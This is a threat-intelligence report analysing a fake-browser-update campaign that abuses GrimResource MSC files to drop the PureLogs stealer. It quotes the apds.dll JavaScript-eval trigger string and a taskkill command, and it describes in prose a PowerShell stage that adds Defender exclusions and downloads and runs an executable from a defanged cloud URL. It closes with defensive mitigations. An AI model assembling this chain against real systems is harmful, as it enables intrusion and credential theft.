From GrimResource to PureLogs Stealer: Dissecting a Recent Attack

BlueVoyant’s Threat Fusion Cell (TFC) and Security Operations Center (SOC) researchers have uncovered a recent cyber campaign featuring a unique twist on fake browser updates. This attack leveraged the GrimResource vulnerability and delivered the PureLogs stealer malware to targeted environments through disguised Microsoft Management Console (MSC) files.

What is GrimResource?

In June 2024, Elastic Security Labs published research on a vulnerability being exploited through Microsoft Management Console (MSC) files. Attackers were able to embed malicious code into these files by taking advantage of an older cross-site scripting (XSS) flaw in a component called apds.dll, which is triggered when MSC files are opened via mmc.exe—the tool used to manage administrative snap-ins on Windows. 

MSC files are configuration files used to launch various built-in system management tools, and this particular flaw—tracked as CVE-2024-43572, also known as GrimResource—allowed attackers to misuse them in unexpected ways. Although Microsoft has since patched the vulnerability, the use of MSC files for malicious purposes appears to be resurfacing. 

The Initial Attack

This campaign began like a traditional fake browser update attack: an unsuspecting user visited a compromised website, typically by clicking phishing links or falling victim to SEO poisoning. However, this attack stood out by targeting active users on a login portal page. If clicking through other tabs, users are not presented with a fake update prompt. This indicates the threat group may have been focusing on the website’s active users versus visitors. 

During the investigation, BlueVoyant researchers discovered the compromised portal page navigation button was appended to point to a custom page crafted by the threat actor named ‘wp-assets-analyzer.html’. This page contains obfuscated JavaScript code that appears to quietly fingerprint the visiting user’s system configuration, with a focus on Windows 10/11 systems specifically. 

It first checks whether the browser is running on a 64-bit Windows 10 or 11 OS using the navigator.userAgent string. If so, it creates a WebGL context to extract GPU fingerprinting data using the WEBGL_debug_renderer_info extension. These are then compared against hardcoded blacklists (e.g., “VMware”, “SwiftShader”) and whitelists (e.g., “NVIDIA”, “Apple M1”) to detect virtualized environments. If the system passes, it sends a POST request to hxxps://verifed.run/api/check which responds with a JSON payload. One key field in this payload is a custom "ref" value, created by Base64-encoding the first 50 characters of the userAgent string.

Depending on the server’s response, the script either writes new content to the page or redirects to Google if the checks fail.

When analyzed, the page loaded code of a ClickFix campaign, displaying a fake page disguised as networking errors and instructing users to copy and paste code into the Run command window using the typical ‘Windows + R’ shortcut. 

During the incident investigation, however, BlueVoyant determined the user was presented with a different page, indicating that their browser was out of date. We then observed the user downloaded a file named ‘Critical Update.msc ’ (4c57640f9b6fc5bfa0676f91d08672ded5a26168).

After acquiring the file from the impacted host, we analyzed the contents and observed that it contained obfuscated code that was passed to res[:]//apds[.]dll/redirect[.]html?target=javascript[:]eval(external.Document.ScopeNamespace.GetRoot().Name) to execute the contents.

Using CyberChef, the decoded contents revealed a VBScript code that uses the WScript Shell object to launch a Powershell command.

The purpose of the PowerShell command is to do the following:

• Run the command with execution policy bypass (-EP Bypass) and no profile (-NoP) to avoid detection and restrictions.
• Adds multiple Windows Defender exclusions to suppress antivirus scanning in key folders:
  • C:\Users\Public
  • C:\Users\Public\Desktop
  • $env:TEMP
  • C:\
  • $env:USERPROFILE\Desktop
  • $env:USERPROFILE\Downloads
• Suppresses error messages for each exclusion using -ErrorAction SilentlyContinue
• Minimizes a new CMD window that executes the following:
  • Attempts to download an executable using Curl
  • Executable is saved to C:\Users\Public\K3MKuoAtPs.exe
• Executable is downloaded from an obfuscated mega[.]io URL: hxxps://s3.g.s4.mega[.]io/icniciy%6dvix%6d5cwexbsy5nwj5voi7ropgjssn/o1o1o1/BRAVO/PR/TVXSGFMQ.exe (%6d = m)
• Deletes a previous executable if it exists: C:\Users\Public\lf8JUsyp94.exe
• If the curl download fails, uses PowerShell’s Invoke-WebRequest (iwr) to download the same file.
• Renames the downloaded file: K3MKuoAtPs.exe → lf8JUsyp94.exe
• Executes the downloaded file
• Kills the mmc.exe process using the following command: taskkill /IM mmc.exe /F

Even though the payload URL was no longer active, BlueVoyant researchers were able to acquire the executable, TVXSGFMQ.exe (f321252e4b2872d4e995c4cf16f83287457a7174) and analyzed its contents in a controlled environment.

Payload Analysis

BlueVoyant researchers found the executable TVXSGFMQ.exe was packaged using the 7-Zip self-extracting installer format. 7-Zip, an open-source file archiver, can create Windows executables that self-extract without requiring 7-Zip to be installed.

The contents within TVXSGFMQ.exe contained numerous Dynamic Link Libraries (DLL), a couple interestingly named files and an executable named Vorte-drive.exe. During analysis of the executable Vorte-drive.exe, BlueVoyant researchers observed it load several of the DLLs during runtime including the following:

• boost_locale.dll
• boost_timer.dll
• bcrypt.dll
• sqlite3_plex.dll
• avcodec-59.dll
• avutil-57.dll
• WS2_32.dll
• libssl-3.dll
• libcrypto-3.dll
• libcurl.dll
• fmt.dll
• dxgi.dll
• KERNEL32.dll
• SHELL32.dll
• ADVAPI32.dll
• MSVCP140.dll
• VCRUNTIME140.dll

During analysis of the loaded libraries, BlueVoyant researchers identified avutil-57.dll (SHA1: 0B0A4471CD5AB3FD51C976F94E6B0BFF01DB1DEE) had a corrupt digital signature, suggesting it modified.

Further inspection revealed that the DLL contained additional code used to read a suspicious file named Thiecktieg.mchn, specifically searching for the byte sequence C6 A5 79 EA. BlueVoyant researchers found this behavior aligns with the known malware loader, IDAT Loader (a.k.a. HijackLoader, GhostPulse Loader).

Using a config extractor, BlueVoyant researchers extracted the embedded payload and determined it was PureLogs stealer which communicated with C2 s162486.love-is[.]nexus.

BlueVoyant researchers found other similar initial URLs suggesting this attack chain began around mid-June and continued through at least early September. Many of the related URLs appear to primarily push ClickFix attacks, which may suggest the operators are simply testing the efficacy of the GrimResource attack.

Nevertheless, this campaign is abusing the patched GrimResource (CVE-2024-43572) vector by disguising fake browser updates as MSC files delivered from compromised login portals; once opened via mmc.exe, the chain runs VBScript and PowerShell with policy bypass to add Defender exclusions, fetch a 7‑Zip SFX package from a cloud host, side‑load a tampered DLL, and ultimately deploy the PureLogs stealer (via IDAT/HijackLoader). This places organizations at immediate risk of credential theft and follow‑on compromise, with activity observed from mid‑June through at least early September.

Remaining Questions

As BlueVoyant continues to track this campaign there remains several areas where further intelligence and community collaboration would be valuable, starting with the attribution of this activity to a known threat actor. The observed TTPs overlap with several eCrime and Initial Access Broker groups, however, no single tracked adversary aligns perfectly with the unique combination of the GrimResource exploit, specific payload chain, and victim-targeting methodology. Further research is needed to:

• Attribute these activities to a specific actor or group.
• Map the full operational infrastructure, including the network of command-and-control servers and exfiltration points.
• Understand the post-exploitation monetization strategy, including how stolen data and credentials are leveraged or sold.
• Identify the complete malware arsenal in use beyond PureLogs stealer.

By continuing to analyze the campaign’s TTPs and collaborating with the wider security community, BlueVoyant aims to uncover additional insights that will strengthen collective defenses against this evolving threat.

Mitigation Strategies

Enterprise organizations can minimize the risks associated with campaigns exploiting GrimResource and similar attack vectors by implementing a layered defense strategy:

1. Endpoint Protection and Monitoring

   1. Restrict Script and Binary Execution: Implement application control policies, such as Windows Defender Application Control or AppLocker, to block the execution of untrusted .msc files, particularly those downloaded from the Internet. Additionally, restrict the execution of PowerShell scripts from common user-writable directories like C:\Users\Public and $env:TEMP.
   2. Enhance PowerShell Logging: Enable and monitor PowerShell script block logging and command-line process auditing. This can help detect the use of suspicious arguments like -EP Bypass and -NoP, which are used to circumvent execution policies.
   3. Monitor for Defense Evasion: Configure endpoint detection and response (EDR) tools to alert on attempts to add new Windows Defender exclusions. Enable tamper protection features to prevent the malware from disabling security controls.
   4. Detect Behavioral Anomalies: Monitor for suspicious process chains, such as mmc.exe being launched by a web browser, which in turn spawns powershell.exe or cmd. exe. EDR solutions should also be configured to detect DLL sideloading, where a legitimate executable (Vorte-drive.exe) loads a malicious DLL (avutil-57.dll).
2. Network Defense
   1. Block Malicious Indicators: Implement network egress filtering to block access to the known command-and-control (C2) domain s162486[.]love-is[.]nexus and other malicious URLs identified in the campaign's indicators of compromise (IOCs).
   2. Web Content Filtering: Utilize web filtering to block access to uncategorized or newly registered domains, as these are often used to host malicious landing pages and payloads. Scrutinize traffic to cloud storage services like Mega if they are not used for legitimate business purposes.
3. Vulnerability and Patch Management
   1. Apply Security Patches: The primary exploit vector is CVE-2024-43572 (GrimResource). Organizations should prioritize applying the relevant Microsoft patch to all Windows systems to close this vulnerability and prevent the initial execution via malicious MSC files.
4. User Awareness and Training
   1. Educate on Social Engineering: Train users to recognize the tactics of fake browser update campaigns and ClickFix lures. Specifically, users should be warned against downloading and opening files, especially .msc files, from unexpected pop-ups or prompts.
   2. Promote Secure Practices: Reinforce that legitimate software updates are typically handled automatically through the application itself or via managed enterprise deployment tools, not through manual downloads prompted by a website.